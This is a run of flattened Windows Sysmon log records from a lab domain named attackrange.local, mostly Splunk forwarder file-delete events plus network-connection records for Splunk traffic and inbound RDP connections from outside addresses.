23542300x80000000000000001056705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:38.529{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147FC2EC5B47E2E13963EFEE5B1156AD,SHA256=6EBACB9AD43EA8B2B5B6D084FA21331A1C6E3233CB2A8ADB84881190154E8B89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:38.699{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD5A025BDCA91A1F7ADD4B0A9E212A9C,SHA256=56E88BA901B50C629D46541950423AF70FDC4C3D1CA9591F4A2EF784B07DFD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:39.824{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B4DCC3F796B8B5C9FBE622FA7AC08C,SHA256=AD6BB4076B797818366A990CC8307ED7F76F328B8D5ABF32B677E3B511726570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:39.529{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0409EEAECA214420D3C4C7A2C8E5AF1,SHA256=3A6E49576F4752934C15537A107289B03A5FD632620F7A4CEDBBF82E137859DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:37.166{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000981277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:40.840{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFD8D03747EE8FDFED66E1D0C8DAEA09,SHA256=477F3B871B28EFEB50340126E4BBB151AED47462B7B488C674EA0A72B30C693F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:40.748{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B2C8275D1E5151D80FBE007FE4C6DAE,SHA256=4DE2550A508D5B79FDC86037A04BB774E1C0FB633E0C6EE0DA06F292F90D312B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:40.530{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AA9F5BDB8C1382935FEFEA226968365,SHA256=37CF2CBEC84A4157A3F334F8B1AB8757532C4B5EDF9A1F21D1A1601D7B6B3C6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:41.856{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E772384D5E980F18C782D1C1C92A6E49,SHA256=A653EF89D4CC0C3B88E55216AAF5FBB479F33DA0EEAA6674CA5999CF29E6A998,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:38.696{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59538-false10.0.1.12-8000- 23542300x80000000000000001056711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:41.530{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F875531D371FD16F5E1C2EFBE8B34729,SHA256=3FC07F71E3DA3A96A13AAF6588935C9E6CBCD0F6A09E54470B065AF86894884A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:39.394{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58996-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000981281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:40.156{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53584-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:42.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC7D71C0ED7A49A2302C1E6663C8143,SHA256=B657EE33AFEB24387DD226DDEE48BE7A76439248C6525205F26EA6492AA41B79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:42.530{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6137167D04EF5C4CE38CCBDFB42D79,SHA256=A7C264660D5B9EEBBBB9EE02464B785166859060040CF868EB2CF65BAFD94050,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:40.732{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com26730-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:43.876{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B605B4804ADCEF116F59B79C70A978,SHA256=C5AA3EC9555683A7641CD1B9EC9D42FB51D23C340DF25423BD640B236EE1783B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:43.531{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE1374FB1D0F78855E7B9DED4FB2F73,SHA256=A73DDE68B0345575AB073F52270B6695986D12E45D3D03EC737F5C5055633AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:43.704{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=596A93F1BF7FEFF62770D162E31D3F72,SHA256=389BAEEF759D674601C5F962CE7D92A0D26E88D95FAE7406B588A133A0326FAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:43.704{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=47C9785897B7CE164050D27AE706DE8B,SHA256=AEA458ABF4A9FD117AC45AE16B9529B2A4659C387EF101B6A45F0199EF3B93CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:44.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91B92C9F5F89BC6C609E6380D3A56A34,SHA256=F51ABE0E1480CDCD82B94CF3A549D84E070D808A448B329F2E57E6B88817DD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:44.531{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC86F7C62BA0986E9BFBEDF224760379,SHA256=A0B85AB981BFEDC69D4755899AD5149BDA9308C3B04EE80FA003322698333535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:44.406{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7E64858AD4B6AC81693454C55E99B3B,SHA256=7E998A149FDB7E6C4C761769DF93193FEE00C9955373F9CB844D9BEF00A35F27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:45.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF527F9C30A4F635B8EBA75F76A18FD8,SHA256=32C9A5C297FFA2144E5A9762385C2453358B5D832F4B394EC2464933075D5210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:45.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBCBB8DDE2E1C997A3179D40CFD1FEC,SHA256=4EF384B7D1CF499613823F709148805CD70D3EE47E60F4A381C365BD1C953C6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:43.059{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000981288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:46.907{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD6B0192A6DF1FCECBCDB1234FE90BC,SHA256=0DE6242FE386A43A51BD2647AAC1A51C026DE64AED12918EA11A2DCD97CC4F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:46.626{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7AC19FA17A52184367B1FB0143F8FB2,SHA256=278C667B341233A40056D45E1D38EB8D8C7A5011DB2F0EA8BCFE486BE8017524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:46.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C0F2CB8045796FC195B73004740B3262,SHA256=2E6EBBB858E0984D657AF8DE2CF2D613C67FB34903E6183E3AD488E3A84B712C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:46.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CF15E12E672E22010F065225E0F96E03,SHA256=47008AA554A786712C961FDA2B1A8FF3E61755399D136CECDF0BC5099D00F9D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:46.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E066AAACDD15403023E0B1BA0B79BB9A,SHA256=62191D7016E8E705D876A945D8FA09B186B87F32205AF318B866329325E37762,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:47.923{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAE8EF96E5205A0020DC84A2514FE8B5,SHA256=8A1D0491FF1C9C4EFC782EEB5BA3CC2F0A5CB00B0A59CC5073BA55096271AA24,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:45.268{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com33853-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:47.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468C37B691293A28AAEA48D998D08639,SHA256=7689E202A28A5ADE90B8E89C938495FDDE79536A0326A8389E0F1C36F5525675,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:43.841{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59539-false10.0.1.12-8000- 23542300x8000000000000000981292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:48.938{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAA99F3C627147D4BE38E93727D8A4D4,SHA256=82D26D376872C09FFBE25B77F260621B2DB35EFEF4ACC60BA3EFA65053823C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:48.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47198E6222261DC73D239C3527EAF5E,SHA256=3AD090B7B3655676C01AD608719F605E1B4A83C76AE363D8BF01B68F2F4B8C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:48.313{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=596A93F1BF7FEFF62770D162E31D3F72,SHA256=389BAEEF759D674601C5F962CE7D92A0D26E88D95FAE7406B588A133A0326FAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:49.954{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B587D2A1C8D66577BDC513D3B3A41FDA,SHA256=4117F5ADA47F7717C8403D38B9E57154194378897B326D036B3F67924B387625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:49.532{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F036B315873D9AF794B634E2192D7269,SHA256=03A0BF23E3F55A1248D61411A42E25CB92C027287AC8E45C0AFE588F446364F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:45.616{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64345-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:50.970{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861DF28EC7556AA37880EA9B6B080504,SHA256=38555D2FB80DDA8E296104F174AC88C52D67C972AB3D31CFFF6699373801DBF6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:48.184{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:50.548{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3234F74BA8EB17626595758478B30E16,SHA256=EE1800929E9E824A650CD34E8296BE0943A2AD79DBCE69A48F4EC65157B0CE49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:51.985{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3665C138EB1CAC2832FFE3B87AA6197,SHA256=05E5136D1D01F3C60B7D698D58CAC1A3EF647ACD12A986DFDD1C5EE652B050DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:51.564{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EF8B0FBDC4AAA6EB6472EFAF1F6F36,SHA256=A4CCCD697878D0C0471C407968F5C52BFE79FE9677168EC6421E93C8808B8AC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:48.516{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58945-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:51.204{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=672028A66FB6490673FB47BFB61C99D2,SHA256=B32E426A643C79114CE3C02C4ED6DC39488023E209EBB320F8982FCEE51F1C1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:52.985{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A0CDEA3E01D5E464A4DE9A5CEBDEB0,SHA256=E968B0C3CBE0F37016E4533AB664FFE2FE41CA12F35DED3B0F2FD0155A5E75A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:50.900{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59736-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:52.564{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEB319C3CF37CC0E3BCDC885BFC8BA94,SHA256=4AC0883989B55D910BDB6B459B266F97189A075A90C85F41451EE7E9579FA6B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:48.857{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59540-false10.0.1.12-8000- 23542300x80000000000000001056730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:52.282{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6EAE40DD9E6661CC4687A3A322F24A7,SHA256=94D06C2C5812ACE3974F7DD050DE4CFDA27D2C66FBF452EA11DA9975353E4890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:52.282{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECA4596DA81A60F3894A706C91824E61,SHA256=4EFCCE8C01431BC771C6E7AD8B4F36BDEA6FD2AFE5DFF0B5EB9484EB311CCD35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:53.564{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 